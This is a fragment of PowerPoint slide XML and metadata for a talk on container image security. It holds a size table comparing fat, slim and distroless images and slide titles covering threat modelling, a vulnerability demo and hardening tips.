                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4181169950"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2201401">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2955766571"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="237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effectLst/>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Image 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effectLst/>
                          <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Approximate Size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7703"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="237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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Fat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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>~1.6GB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4000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="237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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Slim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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>~230MB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037008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="237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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>Distroless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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
                        </a:rPr>
                        <a:t>~180MB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847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83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24</TotalTime>
  <Words>1278</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>202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Equip</vt:lpstr>
      <vt:lpstr>Equip Extended</vt:lpstr>
      <vt:lpstr>Equip Extended ExtraBold</vt:lpstr>
      <vt:lpstr>Equip Extended Light</vt:lpstr>
      <vt:lpstr>Equip Extended Thin</vt:lpstr>
      <vt:lpstr>Equip Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Understanding container images</vt:lpstr>
      <vt:lpstr>What container images contains ?</vt:lpstr>
      <vt:lpstr>Fat vs Slim/Alpine vs Distroless</vt:lpstr>
      <vt:lpstr>Threat modelling</vt:lpstr>
      <vt:lpstr>What do attackers look inside containers?</vt:lpstr>
      <vt:lpstr>Why Fat &amp; Slim images become targets ?</vt:lpstr>
      <vt:lpstr>Attack Surface &amp; CVEs: Fat vs Slim vs Distroless</vt:lpstr>
      <vt:lpstr>How do attackers attack a container ?</vt:lpstr>
      <vt:lpstr>Container Vulnerability Demo</vt:lpstr>
      <vt:lpstr>How one bug becomes a backdoor ?</vt:lpstr>
      <vt:lpstr>Demo code and repository</vt:lpstr>
      <vt:lpstr>Defence with distroless</vt:lpstr>
      <vt:lpstr>How distroless enhances the security ?</vt:lpstr>
      <vt:lpstr>Hardening checklist &amp; CI/CD tips</vt:lpstr>
      <vt:lpstr>Hardening checklist</vt:lpstr>
      <vt:lpstr>CI/CD Tips</vt:lpstr>
      <vt:lpstr>Practical steps to secure workloads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 Nanda</dc:creator>
  <cp:lastModifiedBy>Bharat Nanda</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-14T05:25:46Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-14T05:51:21Z</dcterms:modified>
</cp:coreProperties>
</file>